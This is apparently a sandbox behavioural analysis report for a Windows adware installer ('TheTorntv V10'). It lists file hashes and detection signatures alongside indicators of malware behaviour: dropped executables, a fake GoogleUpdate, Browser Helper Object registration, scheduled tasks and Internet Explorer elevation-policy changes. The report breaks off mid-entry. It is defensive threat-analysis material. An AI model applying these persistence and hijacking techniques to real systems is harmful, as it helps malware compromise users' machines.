Analysis
-
max time kernel
154s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2022 04:30
Static task
static1
Behavioral task
behavioral1
Sample
c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exe
Resource
win7-20220812-en
General
-
Target
c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exe
-
Size
11.7MB
-
MD5
c85b1bbf36dbb8b0e712c614089b512a
-
SHA1
7b0a01c1c0e6170fc2e7dd681addff6a9845b1ce
-
SHA256
c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3
-
SHA512
3c83df266ca733424472c2d2648be488fbd0d28f6cf3f963de218d81c8bc4769d56aad2a177fcace7ce918b97ad8bff0342a8d26f153716801744dd2945d9176
-
SSDEEP
196608:A6b+pyFrwB5Yp/hX+AkZ74MAlfv2tX9jxHcvio9BRLGNAJX6bp7Wn0XHurVcX4Z6:5+gWB5o/hXlkubvWX9FHcviALGyapDuE
Malware Config
Signatures
-
ACProtect 1.3x - 1.4x DLL software 4 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\nsi7438.tmp\md5dll.dll acprotect C:\Users\Admin\AppData\Local\Temp\nsi7438.tmp\md5dll.dll acprotect C:\Users\Admin\AppData\Local\Temp\nsi7438.tmp\md5dll.dll acprotect C:\Users\Admin\AppData\Local\Temp\nsi7438.tmp\md5dll.dll acprotect -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Executes dropped EXE 17 IoCs
Processes:
Bodprv.exeGoogleUpdate.exeGoogleUpdate.exe06c2d203-8730-401c-be3d-3556ebb7cdb0-11.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exe06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exeGoogleUpdate.exe06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe06c2d203-8730-401c-be3d-3556ebb7cdb0-6.exe06c2d203-8730-401c-be3d-3556ebb7cdb0-4.exe06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exeTheTorntv V10-codedownloader.exeTheTorntv V10-codedownloader.exeTheTorntv V10-bg.exepid process 3464 Bodprv.exe 3112 GoogleUpdate.exe 4356 GoogleUpdate.exe 532 06c2d203-8730-401c-be3d-3556ebb7cdb0-11.exe 2400 GoogleUpdate.exe 1436 GoogleUpdate.exe 5004 GoogleUpdate.exe 1496 GoogleUpdate.exe 4512 06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe 3560 GoogleUpdate.exe 2212 06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe 2524 06c2d203-8730-401c-be3d-3556ebb7cdb0-6.exe 3612 06c2d203-8730-401c-be3d-3556ebb7cdb0-4.exe 400 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe 4052 TheTorntv V10-codedownloader.exe 116 TheTorntv V10-codedownloader.exe 3428 TheTorntv V10-bg.exe -
Registers COM server for autorun 1 TTPs 8 IoCs
Processes:
regsvr32.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110611331111}\InprocServer32\ = "C:\\Program Files (x86)\\TheTorntv V10\\TheTorntv V10-bho64.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110611331111}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220622332211}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220622332211}\InprocServer32\ = "C:\\Program Files (x86)\\TheTorntv V10\\TheTorntv V10-bho64.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220622332211}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110611331111}\InprocServer32 regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220622332211}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110611331111}\InprocServer32 regsvr32.exe -
Sets file execution options in registry 2 TTPs 2 IoCs
Processes:
GoogleUpdate.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe GoogleUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" GoogleUpdate.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\nsi7438.tmp\md5dll.dll upx C:\Users\Admin\AppData\Local\Temp\nsi7438.tmp\md5dll.dll upx C:\Users\Admin\AppData\Local\Temp\nsi7438.tmp\md5dll.dll upx C:\Users\Admin\AppData\Local\Temp\nsi7438.tmp\md5dll.dll upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
GoogleUpdate.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation GoogleUpdate.exe -
Loads dropped DLL 64 IoCs
Processes:
c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exeBodprv.exeGoogleUpdate.exeGoogleUpdate.exepid process 4824 c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exe 4824 c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exe 4824 c342e3b65bdf154878b86880ec05a1e04bb1a44a2fa1fe4dbca40662a15452a3.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3112 GoogleUpdate.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 4356 GoogleUpdate.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe 3464 Bodprv.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeGoogleUpdate.exedescription ioc process File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: GoogleUpdate.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\S: GoogleUpdate.exe File opened (read-only) \??\Y: GoogleUpdate.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\U: GoogleUpdate.exe File opened (read-only) \??\W: GoogleUpdate.exe File opened (read-only) \??\K: GoogleUpdate.exe File opened (read-only) \??\L: GoogleUpdate.exe File opened (read-only) \??\P: GoogleUpdate.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\G: GoogleUpdate.exe File opened (read-only) \??\J: GoogleUpdate.exe File opened (read-only) \??\H: GoogleUpdate.exe File opened (read-only) \??\Q: GoogleUpdate.exe File opened (read-only) \??\R: GoogleUpdate.exe File opened (read-only) \??\T: GoogleUpdate.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\E: GoogleUpdate.exe File opened (read-only) \??\X: GoogleUpdate.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: GoogleUpdate.exe File opened (read-only) \??\O: GoogleUpdate.exe File opened (read-only) \??\A: GoogleUpdate.exe File opened (read-only) \??\F: GoogleUpdate.exe File opened (read-only) \??\V: GoogleUpdate.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: GoogleUpdate.exe File opened (read-only) \??\M: GoogleUpdate.exe File opened (read-only) \??\N: GoogleUpdate.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe -
Installs/modifies Browser Helper Object 2 TTPs 8 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
Processes:
regsvr32.exeregsvr32.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611331111}\NoExplorer = "1" regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611331111} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611331111} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611331111}\ = "9ab333d0052b01323ffd0f6cdde3bdb00063311" regsvr32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611331111}\NoExplorer = "1" regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611331111} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611331111} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611331111}\ = "9ab333d0052b01323ffd0f6cdde3bdb00063311" regsvr32.exe -
Drops file in Program Files directory 42 IoCs
Processes:
Bodprv.exeGoogleUpdate.exedescription ioc process File opened for modification C:\Program Files (x86)\TheTorntv V10\Uninstall.exe Bodprv.exe File created C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\goopdateres_en.dll GoogleUpdate.exe File created C:\Program Files (x86)\TheTorntv V10\508b9fc9-7764-4fce-8115-7cc423103747.crx Bodprv.exe File created C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\psuser.dll GoogleUpdate.exe File created C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-7.exe Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-bho.dll Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\utils.exe Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\Uninstall.exe Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\1293297481.mxaddon Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\bgNova.html Bodprv.exe File created C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll GoogleUpdate.exe File created C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-bg.exe Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-11.exe Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-64.exe Bodprv.exe File created C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe GoogleUpdate.exe File created C:\Program Files (x86)\TheTorntv V10\327a57f2-a43e-46bc-a485-c8bb73de636f.crx Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-3.exe Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-6.exe Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\ce2d750e-c066-418b-93f9-ebd056f7b422.dll Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-4.exe Bodprv.exe File opened for modification C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe GoogleUpdate.exe File created C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe GoogleUpdate.exe File created C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0.crx Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0.xpi Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\background.html Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-buttonutil.exe Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-buttonutil64.exe Bodprv.exe File created C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\goopdate.dll GoogleUpdate.exe File created C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\psmachine.dll GoogleUpdate.exe File created C:\Program Files (x86)\TheTorntv V10\508b9fc9-7764-4fce-8115-7cc423103747.dll Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-bho64.dll Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-buttonutil.dll Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\06c2d203-8730-401c-be3d-3556ebb7cdb0-5.exe Bodprv.exe File created C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe GoogleUpdate.exe File created C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi GoogleUpdate.exe File opened for modification C:\Program Files (x86)\TheTorntv V10\bgNova.html Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-codedownloader.exe Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\TheTorntv V10-buttonutil64.dll Bodprv.exe File created C:\Program Files (x86)\TheTorntv V10\TheTorntv V10.ico Bodprv.exe File created C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe GoogleUpdate.exe File created C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe GoogleUpdate.exe -
Drops file in Windows directory 35 IoCs
Processes:
Bodprv.exemsiexec.exeGoogleUpdate.exedescription ioc process File opened for modification C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-5_user.job Bodprv.exe File created C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-7.job Bodprv.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIE261.tmp msiexec.exe File opened for modification C:\Windows\Tasks\temp_06c2d203-8730-401c-be3d-3556ebb7cdb0-6.job Bodprv.exe File created C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-4.job Bodprv.exe File created C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-5_user.job Bodprv.exe File opened for modification C:\Windows\Tasks\VEVONBKZ.job Bodprv.exe File created C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-11.job Bodprv.exe File created C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-6.job Bodprv.exe File created C:\Windows\Tasks\temp_06c2d203-8730-401c-be3d-3556ebb7cdb0-2.job Bodprv.exe File opened for modification C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-3.job Bodprv.exe File opened for modification C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-6.job Bodprv.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2} msiexec.exe File opened for modification C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-4.job Bodprv.exe File created C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-3.job Bodprv.exe File created C:\Windows\Tasks\temp_06c2d203-8730-401c-be3d-3556ebb7cdb0-6.job Bodprv.exe File created C:\Windows\Tasks\VQVYYJC.job Bodprv.exe File created C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-1.job Bodprv.exe File opened for modification C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-1.job Bodprv.exe File opened for modification C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-5.job Bodprv.exe File created C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job GoogleUpdate.exe File opened for modification C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-7.job Bodprv.exe File opened for modification C:\Windows\Tasks\VQVYYJC.job Bodprv.exe File opened for modification C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-2.job Bodprv.exe File created C:\Windows\Tasks\VEVONBKZ.job Bodprv.exe File opened for modification C:\Windows\Installer\e57ce4c.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-2.job Bodprv.exe File opened for modification C:\Windows\Tasks\temp_06c2d203-8730-401c-be3d-3556ebb7cdb0-2.job Bodprv.exe File created C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job GoogleUpdate.exe File opened for modification C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-11.job Bodprv.exe File created C:\Windows\Installer\e57ce4c.msi msiexec.exe File created C:\Windows\Tasks\06c2d203-8730-401c-be3d-3556ebb7cdb0-5.job Bodprv.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\nscD01.tmp\Bodprv.exe nsis_installer_2 C:\Users\Admin\AppData\Local\Temp\nscD01.tmp\Bodprv.exe nsis_installer_2 -
Processes:
Bodprv.exeGoogleUpdate.exe06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exeGoogleUpdate.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0cd21c16-5dc6-499e-a2e9-25ca35a21a52}\AppName = "TheTorntv V10-bg.exe" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{66677745-b57a-4780-9bdc-77335f091741}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{66677745-b57a-4780-9bdc-77335f091741}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12c6d5df-53e6-4c04-a804-b79439878095}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" Bodprv.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12c6d5df-53e6-4c04-a804-b79439878095} Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\AppName = "GoogleUpdate.exe" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0cd21c16-5dc6-499e-a2e9-25ca35a21a52} Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{66677745-b57a-4780-9bdc-77335f091741}\AppName = "TheTorntv V10-codedownloader.exe" Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12c6d5df-53e6-4c04-a804-b79439878095}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{80F1A8A5-293A-4F14-9B9E-EC56FDDD66B}\AppName = "06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe-codedownloader.exe" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BDAEC487-B7C8-4335-AF31-11F227847C30}\Policy = "3" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0cd21c16-5dc6-499e-a2e9-25ca35a21a52}\Policy = "1" Bodprv.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Approved Extensions 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E10E2173-D714-49E0-BDBA-679C9A114F6F}\AppName = "06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe-helper.exe" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E10E2173-D714-49E0-BDBA-679C9A114F6F}\Policy = "3" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{66677745-b57a-4780-9bdc-77335f091741}\Policy = "3" Bodprv.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{66677745-b57a-4780-9bdc-77335f091741}\Policy = "3" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12c6d5df-53e6-4c04-a804-b79439878095}\AppName = "TheTorntv V10-buttonutil.exe" Bodprv.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12c6d5df-53e6-4c04-a804-b79439878095} Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e8c59608-deae-41f7-83a8-7a00ad4c556a}\AppName = "TheTorntv V10-buttonutil64.exe" Bodprv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\Policy = "3" GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{80F1A8A5-293A-4F14-9B9E-EC56FDDD66B}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3DC6B674-2DA2-4B10-B21D-B32B7CBA7DBB} 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{66677745-b57a-4780-9bdc-77335f091741}\Policy = "3" Bodprv.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\TheTorntv V10-bg.exe = "8000" Bodprv.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{66677745-b57a-4780-9bdc-77335f091741} Bodprv.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12c6d5df-53e6-4c04-a804-b79439878095}\Policy = "3" Bodprv.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e8c59608-deae-41f7-83a8-7a00ad4c556a} Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e8c59608-deae-41f7-83a8-7a00ad4c556a}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\CLSID = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}" GoogleUpdate.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{80F1A8A5-293A-4F14-9B9E-EC56FDDD66B} 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\DefaultValue = "PMIL" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12c6d5df-53e6-4c04-a804-b79439878095}\AppName = "TheTorntv V10-buttonutil.exe" Bodprv.exe Set value (int) 